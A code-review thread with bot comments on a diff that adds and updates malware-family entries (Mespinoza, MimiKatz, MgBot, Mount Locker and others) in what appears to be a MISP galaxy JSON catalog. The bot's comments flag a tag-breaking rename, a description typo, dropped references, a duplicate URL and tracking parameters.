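Review bot: Renaming the existing cluster's `"value"` from `"Medusa"` to `"Medusa (Windows)"` while keeping uuid `237a1c2d-eb14-483d-9a2e-82f10b63ec06` changes the `misp-galaxy:...="<value>"` tag string derived from it, so data already tagged with the old name will no longer match this entry by name even though the uuid still resolves. Adding `"Medusa"` to the entry's `"synonyms"` (currently `[]`) or noting the rename in the changelog would keep the old name discoverable. The same hunk also drops the `webcache.googleusercontent.com` Medusa ref, which looks like a dead-link cleanup; an archived copy would preserve the citation if the source mattered.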
@@ -11507,13 +21285,80 @@ "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e", "value": "Merlin" }, + { + "description": "Mespinosa is a ransomware which encrypts file using an asymmetric encryption and adds .pysa as file extension. According to dissectingmalware the extension \"pysa\" is probably derived from the Zanzibari Coin with the same name.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza", + "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/", + "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/", + "https://twitter.com/campuscodi/status/1347223969984897026" + ], + "synonyms": [ + "pysa" + ], + "type": [] + }, + "uuid": "68a7ca8e-2902-43f2-ad23-a77b4c48221d", + "value": "Mespinoza" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin", + "https://id-ransomware.blogspot.com/2020/10/metadata-bin-ransomware.html" + ], + "synonyms": [ + "Ransomware32" + ], + "type": [] + }, + "uuid": "750c5b2c-1489-4e11-b21d-c49b651d9227", + "value": "MetadataBin Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/", + "https://s.tencent.com/research/report/944.html", + 
"https://www.secrss.com/articles/17900", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html", + "https://m.threatbook.cn/detail/2527", + "https://www.youtube.com/watch?v=ftjDH65kw6E", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/" + ], + "synonyms": [ + "denesRAT" + ], + "type": [] + }, + "uuid": "64304fcc-5bc8-4000-9be2-4fc7a482897a", + "value": "METALJACK" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", + "https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md", + "https://blog.ensilo.com/metamorfo-avast-abuser", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", - "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html" + "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767" ], "synonyms": [ "Casbaneiro" 
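Review bot: The new Mespinoza description opens with `Mespinosa is a ransomware`, which disagrees with the entry's `"value": "Mespinoza"` and with its `win.mespinoza` identifier; the first word should read `Mespinoza`. The description text appears to be copied verbatim from upstream, so correcting it at the source avoids the next regeneration reverting a local edit.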
@@ -11523,6 +21368,29 @@ "uuid": "18dc3e7a-600d-4e5f-a283-86156b938530", "value": "Metamorfo" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://blog.morphisec.com/fin7-attacks-restaurant-industry", + "http://schierlm.users.sourceforge.net/avevasion.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "13a5c0ae-8e2d-4a38-8b6c-7d746e159991", + "value": "Meterpreter (Windows)" + }, { "description": "", "meta": { @@ -11539,8 +21407,23 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", - "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mgbot", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/" + ], + "synonyms": [ + "BLame", + "MgmBot" + ], + "type": [] + }, + "uuid": "d97c2c0c-ef3a-4512-846a-f4cdeee7787a", + "value": "MgBot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha" ], "synonyms": [], "type": [] 
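Review bot: In the second hunk the Miancha entry loses its only external reference (`https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf`) and is left with just the malpedia link, while the removed lines are repurposed for the new MgBot entry. If that was a dead-link cleanup, an archived snapshot of the advisory would preserve the citation; if it was unintentional, the ref should be restored on the Miancha entry.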
@@ -11566,8 +21449,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://github.com/dlegezo/common", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", - "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/", + "https://securelist.com/microcin-is-here/97353/" ], "synonyms": [], "type": [] @@ -11582,7 +21473,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", - "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/micropsia_apt_c_23.md" ], "synonyms": [], "type": [] @@ -11594,7 +21486,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi", + "https://www.anomali.com/blog/targeted-ransomware-activity" ], "synonyms": [], "type": [] 
@@ -11615,16 +21508,76 @@ "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", "value": "MILKMAID" }, + { + "description": "In August 2019, Kaspersky Labs discovered a malware they dubbed Milum (naming based on internal file name fragments) when investigating an operation they named WildPressure. It is written in C++ using STL, primarily to parse JSON. Functionality includes bidirectional file transmission and remote command execution.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.milum", + "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d1942959-9c6f-462b-87bf-da6ed914669d", + "value": "Milum" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", - "https://github.com/gentilkiwi/mimikatz", + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", - "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle", + "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + 
"https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
+ "https://github.com/gentilkiwi/mimikatz",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
+ "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
+ "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
+ "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
 "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
- " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
+ 
"https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://www.hvs-consulting.de/lazarus-report/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood"
 ],
 "synonyms": [],
 "type": [] 
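Review bot: The rebuilt MimiKatz refs list the same SecureWorks profile twice, as `http://www.secureworks.com/research/threat-profiles/gold-kingswood` near the top of the hunk and `https://www.secureworks.com/research/threat-profiles/gold-kingswood` as the final element; only the https form should stay. The CrowdStrike entry also carries tracking parameters, `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`, that add nothing to the citation and should be stripped, in the same spirit as the hunk's replacement of the leading-space Symantec URL with a clean one. If this block is exported from upstream rather than hand-edited, the deduplication belongs there.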
@@ -11632,6 +21585,25 @@
"uuid": "588fb91d-59c6-4667-b299-94676d48b17b",
"value": "MimiKatz"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge",
+ "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures",
+ "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html",
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
+ "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
+ "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/"
+ ],
+ "synonyms": [
+ "GazGolder"
+ ],
+ "type": []
+ },
+ "uuid": "663d4310-51ea-4ac1-9426-b9e9c5210471",
+ "value": "MINEBRIDGE"
+ },
{
"description": "",
"meta": {
@@ -11645,12 +21617,33 @@
"uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41",
"value": "MiniASP"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke",
+ "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
+ "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html",
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3d164ab8-58a5-433c-bbc9-b81a869ac8c8",
+ "value": "MiniDuke"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage",
- "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
+ "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf",
+ "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
],
"synonyms": [],
"type": []
@@ -11678,6 +21671,7 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai",
"https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
"https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
"https://twitter.com/PhysicalDrive0/status/830070569202749440"
],
"synonyms": [],
@@ -11714,6 +21708,35 @@
"uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da",
"value": "Misfox"
},
+ {
+ "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald\u2019s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu",
+ "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces"
+ ],
+ "synonyms": [
+ "URSA"
+ ],
+ "type": []
+ },
+ "uuid": "ffc9ffcc-24f4-4e60-ab02-a75b007359fa",
+ "value": "Mispadu"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistyveal",
+ "https://www.epicturla.com/previous-works/hitb2020-voltron-sta"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d594d6c1-6d10-4fe8-acda-397df91c73ba",
+ "value": "MISTYVEAL"
+ },
{
"description": "",
"meta": {
@@ -11730,8 +21753,7 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core",
- "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core"
],
"synonyms": [],
"type": []
@@ -11764,6 +21786,19 @@
"uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d",
"value": "Mocton"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe",
+ "https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a4b3d07a-b3ce-4128-9c5c-caa218518a00",
+ "value": "ModPipe"
+ },
{
"description": "",
"meta": {
@@ -11801,6 +21836,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes",
+ "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/",
"https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
],
"synonyms": [],
@@ -11823,13 +21859,27 @@
"uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f",
"value": "Mole"
},
+ {
+ "description": "MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet",
+ "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "76842aa1-f06d-49cf-90df-158346525f91",
+ "value": "MoleNet"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader",
"http://www.clearskysec.com/iec/",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf"
+ "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
+ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
],
"synonyms": [],
"type": []
@@ -11842,6 +21892,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/",
"https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/"
],
"synonyms": [
@@ -11852,6 +21903,21 @@
"uuid": "c57a4168-cd09-4611-a665-bbcede80f42b",
"value": "Monero Miner"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree",
+ "https://securelist.com/montysthree-industrial-espionage/98972/"
+ ],
+ "synonyms": [
+ "MT3"
+ ],
+ "type": []
+ },
+ "uuid": "8a6013a1-5e5c-41f5-bd8e-c86ea7f108d9",
+ "value": "MontysThree"
+ },
{
"description": "",
"meta": {
@@ -11865,6 +21931,21 @@
"uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460",
"value": "MoonWind"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://twitter.com/Timele9527/status/1272776776335233024",
+ "https://live.paloaltonetworks.com/t5/custom-signatures/how-to-stop-mortiagent-malware-using-the-snort-rule/td-p/326590#"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3de9ccf5-4756-4c5b-9086-6664f5a9b761",
+ "value": "MoriAgent"
+ },
{
"description": "",
"meta": {
@@ -11897,9 +21978,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito",
- "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/",
+ "https://www.recordedfuture.com/turla-apt-infrastructure/",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
"https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+ "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/"
],
"synonyms": [],
"type": []
@@ -11907,6 +21991,24 @@
"uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba",
"value": "Mosquito"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker",
+ "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/",
+ "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/",
+ "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/",
+ "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b5814e05-532a-4262-a8da-82fd0d7605ee",
+ "value": "Mount Locker"
+ },
{
"description": "",
"meta": {
@@ -11948,6 +22050,32 @@
"uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
"value": "MPKBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec",
+ "https://dissectingmalwa.re/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1e301d67-cd12-4f46-bcb3-c60f9b78c4d0",
+ "value": "MrDec Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mr_peter",
+ "https://github.com/mrfr05t/Mr.Peter"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "677123aa-3a1a-4443-a968-4f6f4bc6b3c2",
+ "value": "MrPeter"
+ },
{
"description": "",
"meta": {
@@ -11967,7 +22095,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
],
"synonyms": [],
"type": []
@@ -11979,7 +22108,8 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf"
],
"synonyms": [],
"type": []
@@ -12000,12 +22130,50 @@
"uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5",
"value": "Mutabaha"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "77d74e8c-664a-42b7-a55d-735ea138a898",
+ "value": "MyDogs"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom",
+ "https://www.malware-traffic-analysis.net/2018/12/19/index.html",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503",
+ "https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069",
+ "http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf"
+ ],
+ "synonyms": [
+ "Mimail",
+ "Novarg"
+ ],
+ "type": []
+ },
+ "uuid": "ac3483f9-522e-4fbc-b072-e5f76972e7b3",
+ "value": "MyDoom"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf",
"https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
+ "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf",
"http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
],
"synonyms": [],
@@ -12019,14 +22187,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot",
+ "https://blog.centurylink.com/mylobot-continues-global-infections/",
+ "https://github.com/360netlab/DGA/issues/36",
+ "http://www.freebuf.com/column/153424.html",
+ "https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html",
+ "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
